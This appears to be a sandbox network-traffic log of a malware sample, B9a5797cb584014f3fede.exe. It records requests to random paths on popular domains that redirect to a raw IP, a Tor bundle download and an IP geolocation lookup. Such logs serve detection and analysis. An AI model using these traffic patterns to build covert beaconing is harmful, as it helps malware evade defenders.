Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
X-EDPS-Request-Status: normal
Strict-Transport-Security: max-age=15724800
Cache-Control: max-age=3600
Date: Sat, 14 Oct 2023 18:21:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TS01a40e5a=016c9a7a13ab87b0f065443b2ed3f39c1bb18280ac2041ac6b25757bc8d4f958acd7eb0475fd0b83f85eda1a93f5f6371c8c97d5d1; Path=/; Domain=.eset.com
GET

https://www.pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: www.pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
ph-redirect: 1020
location: http://154.61.71.51
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB9F2DB-A7F09DF; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB9F2DB-A7F09DF; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: www.pornhub.com

Response

HTTP/1.1 302 Found

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
ph-redirect: 1020
location: http://154.61.71.51
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB9F2DB-A7F09F5; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB9F2DB-A7F09F5; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/NXksi90VVl?q=1

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /NXksi90VVl?q=1 HTTP/1.1
Host: www.pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
ph-redirect: 1020
location: http://154.61.71.51
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB31F45D-A14844C; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB31F45D-A14844C; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload

13.107.213.67:80

http://openai.com/ScdEUc6SlP?q=1

http

B9a5797cb584014f3fede.exe

515 B
857 B
6
6

HTTP Request

POST http://openai.com/ScdEUc6SlP?q=1

HTTP Response

307
66.254.114.41:80

http://pornhub.com/nZJ8XB6TLb?q=129

http

B9a5797cb584014f3fede.exe

313 B
374 B
5
4

HTTP Request

GET http://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301
142.250.179.142:80

http://google.com/xINnIoXK0o?q=0

http

B9a5797cb584014f3fede.exe

394 B
2.0kB
6
6

HTTP Request

POST http://google.com/xINnIoXK0o?q=0

HTTP Response

404
142.250.179.142:80

http://google.com/xINnIoXK0o?q=0

http

B9a5797cb584014f3fede.exe

394 B
2.0kB
6
6

HTTP Request

POST http://google.com/xINnIoXK0o?q=0

HTTP Response

404
159.69.63.226:443

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

tls, http

B9a5797cb584014f3fede.exe

281.5kB
11.8MB
4873
8426

HTTP Request

GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

HTTP Response

200
66.254.114.41:80

http://pornhub.com/YvXAWrkHSP?q=0

http

B9a5797cb584014f3fede.exe

514 B
355 B
6
5

HTTP Request

POST http://pornhub.com/YvXAWrkHSP?q=0

HTTP Response

301
13.107.213.67:80

http://openai.com/ftOpuXgkwC?q=229

http

B9a5797cb584014f3fede.exe

312 B
796 B
5
5

HTTP Request

GET http://openai.com/ftOpuXgkwC?q=229

HTTP Response

307
208.95.112.1:80

http://ip-api.com/line?fields=query,country

http

B9a5797cb584014f3fede.exe

315 B
407 B
5
5

HTTP Request

GET http://ip-api.com/line?fields=query,country

HTTP Response

200
91.228.166.47:80

http://eset.com/0O9WHnWMZM?q=0

http

B9a5797cb584014f3fede.exe

499 B
719 B
6
6

HTTP Request

POST http://eset.com/0O9WHnWMZM?q=0

HTTP Response

301
216.58.214.14:80

http://youtube.com/wsVZjAbAO0?q=2

http

B9a5797cb584014f3fede.exe

2.5kB
62.3kB
38
61

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400
216.58.214.14:80

http://youtube.com/Ep3hnbR6IC?q=0

http

B9a5797cb584014f3fede.exe

2.6kB
54.7kB
34
59

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Response

400

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400
104.16.30.98:80

http://blockchain.com/GjMLkoZqDj?q=1

http

B9a5797cb584014f3fede.exe

2.1kB
2.7kB
14
13

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301
104.16.30.98:80

http://blockchain.com/GjMLkoZqDj?q=1

http

B9a5797cb584014f3fede.exe

974 B
1.0kB
8
8

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301
66.254.114.41:443

https://pornhub.com/nZJ8XB6TLb?q=129

tls, http

B9a5797cb584014f3fede.exe

747 B
5.8kB
8
9

HTTP Request

GET https://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301
13.107.213.67:443

https://openai.com/ftOpuXgkwC?q=229

tls, http

B9a5797cb584014f3fede.exe

899 B
9.9kB
10
14

HTTP Request

GET https://openai.com/ftOpuXgkwC?q=229

HTTP Response

404
66.254.114.41:443

https://pornhub.com/YvXAWrkHSP?q=0

tls, http

B9a5797cb584014f3fede.exe

739 B
4.9kB
8
8

HTTP Request

GET https://pornhub.com/YvXAWrkHSP?q=0

HTTP Response

301
13.107.213.67:443

https://openai.com/ScdEUc6SlP?q=1

tls, http

B9a5797cb584014f3fede.exe

1.1kB
6.5kB
10
15

HTTP Request

POST https://openai.com/ScdEUc6SlP?q=1

HTTP Response

405
142.250.179.142:80

http://google.com/xINnIoXK0o?q=0

http

B9a5797cb584014f3fede.exe

370 B
2.0kB
6
6

HTTP Request

POST http://google.com/xINnIoXK0o?q=0

HTTP Response

404
142.250.179.142:80

http://google.com/xINnIoXK0o?q=0

http

B9a5797cb584014f3fede.exe

370 B
2.0kB
6
6

HTTP Request

POST http://google.com/xINnIoXK0o?q=0

HTTP Response

404
104.16.30.98:80

http://blockchain.com/GjMLkoZqDj?q=1

http

B9a5797cb584014f3fede.exe

956 B
1.3kB
8
7

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301
104.16.29.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
23.72.252.169:443

https://www.eset.com/0O9WHnWMZM/?q=0

tls, http

B9a5797cb584014f3fede.exe

2.7kB
91.5kB
49
82

HTTP Request

GET https://www.eset.com/0O9WHnWMZM?q=0

HTTP Response

301

HTTP Request

GET https://www.eset.com/0O9WHnWMZM/?q=0

HTTP Response

404
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
66.254.114.41:443

https://www.pornhub.com/YvXAWrkHSP?q=0

tls, http

B9a5797cb584014f3fede.exe

753 B
5.6kB
8
9

HTTP Request

GET https://www.pornhub.com/YvXAWrkHSP?q=0

HTTP Response

302
66.254.114.41:443

https://www.pornhub.com/nZJ8XB6TLb?q=129

tls, http

B9a5797cb584014f3fede.exe

755 B
5.6kB
8
9

HTTP Request

GET https://www.pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

302
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
154.61.71.51:80

B9a5797cb584014f3fede.exe

152 B
3
154.61.71.51:80

B9a5797cb584014f3fede.exe

152 B
3
88.221.25.169:80

http://apps.identrust.com/roots/dstrootcax3.p7c

http

B9a5797cb584014f3fede.exe

323 B
1.6kB
4
4

HTTP Request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

HTTP Response

200
13.107.213.67:80

http://openai.com/ftOpuXgkwC?q=229

http

B9a5797cb584014f3fede.exe

266 B
720 B
4
5

HTTP Request

GET http://openai.com/ftOpuXgkwC?q=229

HTTP Response

307
13.107.213.67:80

http://openai.com/ScdEUc6SlP?q=1

http

B9a5797cb584014f3fede.exe

515 B
857 B
6
6

HTTP Request

POST http://openai.com/ScdEUc6SlP?q=1

HTTP Response

307
208.95.112.1:80

http://ip-api.com/line?fields=query,country

http

B9a5797cb584014f3fede.exe

315 B
367 B
5
4

HTTP Request

GET http://ip-api.com/line?fields=query,country

HTTP Response

200
66.254.114.41:80

http://pornhub.com/NXksi90VVl?q=1

http

B9a5797cb584014f3fede.exe

625 B
496 B
7
6

HTTP Request

GET http://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301

HTTP Request

POST http://pornhub.com/NXksi90VVl?q=1

HTTP Response

301
66.254.114.41:80

http://pornhub.com/nZJ8XB6TLb?q=129

http

B9a5797cb584014f3fede.exe

307 B
233 B
5
3

HTTP Request

GET http://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301
142.250.179.142:80

http://google.com/In4oCqfhFE?q=131

http

B9a5797cb584014f3fede.exe

397 B
3.7kB
6
7

HTTP Request

GET http://google.com/7jG017oTlL?q=93

HTTP Response

404

HTTP Request

GET http://google.com/In4oCqfhFE?q=131

HTTP Response

404
216.58.214.14:80

http://youtube.com/wsVZjAbAO0?q=2

http

B9a5797cb584014f3fede.exe

2.7kB
62.4kB
38
64

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400

HTTP Response

400
159.69.63.226:443

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

tls, http

B9a5797cb584014f3fede.exe

242.6kB
11.4MB
4772
8179

HTTP Request

GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

HTTP Response

200
66.254.114.41:443

https://pornhub.com/NXksi90VVl?q=1

tls, http

B9a5797cb584014f3fede.exe

861 B
5.8kB
9
9

HTTP Request

GET https://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301

HTTP Request

GET https://pornhub.com/NXksi90VVl?q=1

HTTP Response

301
66.254.114.41:443

https://pornhub.com/nZJ8XB6TLb?q=129

tls, http

B9a5797cb584014f3fede.exe

741 B
4.9kB
8
8

HTTP Request

GET https://pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

301
216.58.214.14:80

http://youtube.com/wsVZjAbAO0?q=2

http

B9a5797cb584014f3fede.exe

2.5kB
47.0kB
31
53

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/Ep3hnbR6IC?q=0

HTTP Response

400

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2

HTTP Request

POST http://youtube.com/wsVZjAbAO0?q=2
91.228.166.47:80

http://eset.com/yLjHhBPMcU?q=108

http

B9a5797cb584014f3fede.exe

304 B
656 B
5
5

HTTP Request

GET http://eset.com/yLjHhBPMcU?q=108

HTTP Response

301
104.16.30.98:80

http://blockchain.com/GjMLkoZqDj?q=1

http

B9a5797cb584014f3fede.exe

1.7kB
1.8kB
11
10

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301
104.16.30.98:80

http://blockchain.com/GjMLkoZqDj?q=1

http

B9a5797cb584014f3fede.exe

2.1kB
2.7kB
13
13

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301

HTTP Request

POST http://blockchain.com/GjMLkoZqDj?q=1

HTTP Response

301
13.107.213.67:443

https://openai.com/ftOpuXgkwC?q=229

tls, http

B9a5797cb584014f3fede.exe

899 B
9.9kB
10
14

HTTP Request

GET https://openai.com/ftOpuXgkwC?q=229

HTTP Response

404
13.107.213.67:443

https://openai.com/ScdEUc6SlP?q=1

tls, http

B9a5797cb584014f3fede.exe

1.1kB
6.5kB
10
15

HTTP Request

POST https://openai.com/ScdEUc6SlP?q=1

HTTP Response

405
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
142.250.179.142:80

http://google.com/xINnIoXK0o?q=0

http

B9a5797cb584014f3fede.exe

370 B
2.0kB
6
6

HTTP Request

POST http://google.com/xINnIoXK0o?q=0

HTTP Response

404
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
23.72.252.139:443

https://www.eset.com/yLjHhBPMcU/?q=108

tls, http

B9a5797cb584014f3fede.exe

2.9kB
92.7kB
53
83

HTTP Request

GET https://www.eset.com/yLjHhBPMcU?q=108

HTTP Response

301

HTTP Request

GET https://www.eset.com/yLjHhBPMcU/?q=108

HTTP Response

404
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
66.254.114.41:443

https://www.pornhub.com/nZJ8XB6TLb?q=129

tls, http

B9a5797cb584014f3fede.exe

881 B
6.5kB
9
11

HTTP Request

GET https://www.pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

302

HTTP Request

GET https://www.pornhub.com/nZJ8XB6TLb?q=129

HTTP Response

302
104.16.30.98:443

www.blockchain.com

tls

B9a5797cb584014f3fede.exe

390 B
219 B
5
5
66.254.114.41:443

https://www.pornhub.com/NXksi90VVl?q=1

tls, http

B9a5797cb584014f3fede.exe

799 B
5.7kB
9
9

HTTP Request

GET https://www.pornhub.com/NXksi90VVl?q=1

HTTP Response

302
154.61.71.51:80

B9a5797cb584014f3fede.exe

152 B
3
154.61.71.51:80

B9a5797cb584014f3fede.exe

152 B
3

8.8.8.8:53

pornhub.com

dns

B9a5797cb584014f3fede.exe

57 B
73 B
1
1

DNS Request

pornhub.com

DNS Response

66.254.114.41
8.8.8.8:53

google.com

dns

B9a5797cb584014f3fede.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.142
8.8.8.8:53

openai.com

dns

B9a5797cb584014f3fede.exe

56 B
88 B
1
1

DNS Request

openai.com

DNS Response

13.107.213.67

13.107.246.67
8.8.8.8:53

google.com

dns

B9a5797cb584014f3fede.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.142
8.8.8.8:53

pornhub.com

dns

B9a5797cb584014f3fede.exe

57 B
73 B
1
1

DNS Request

pornhub.com

DNS Response

66.254.114.41
8.8.8.8:53

youtube.com

dns

B9a5797cb584014f3fede.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.214.14
8.8.8.8:53

ip-api.com

dns

B9a5797cb584014f3fede.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

blockchain.com

dns

B9a5797cb584014f3fede.exe

60 B
92 B
1
1

DNS Request

blockchain.com

DNS Response

104.16.30.98

104.16.29.98
8.8.8.8:53

youtube.com

dns

B9a5797cb584014f3fede.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.214.14
8.8.8.8:53

eset.com

dns

B9a5797cb584014f3fede.exe

54 B
86 B
1
1

DNS Request

eset.com

DNS Response

91.228.166.47

91.228.167.128
8.8.8.8:53

archive.torproject.org

dns

B9a5797cb584014f3fede.exe

68 B
109 B
1
1

DNS Request

archive.torproject.org

DNS Response

159.69.63.226
8.8.8.8:53

blockchain.com

dns

B9a5797cb584014f3fede.exe

60 B
92 B
1
1

DNS Request

blockchain.com

DNS Response

104.16.30.98

104.16.29.98
8.8.8.8:53

www.blockchain.com

dns

B9a5797cb584014f3fede.exe

64 B
96 B
1
1

DNS Request

www.blockchain.com

DNS Response

104.16.29.98

104.16.30.98
8.8.8.8:53

www.eset.com

dns

B9a5797cb584014f3fede.exe

58 B
204 B
1
1

DNS Request

www.eset.com

DNS Response

23.72.252.169

23.72.252.139
8.8.8.8:53

www.blockchain.com

dns

B9a5797cb584014f3fede.exe

64 B
96 B
1
1

DNS Request

www.blockchain.com

DNS Response

104.16.30.98

104.16.29.98
8.8.8.8:53

www.pornhub.com

dns

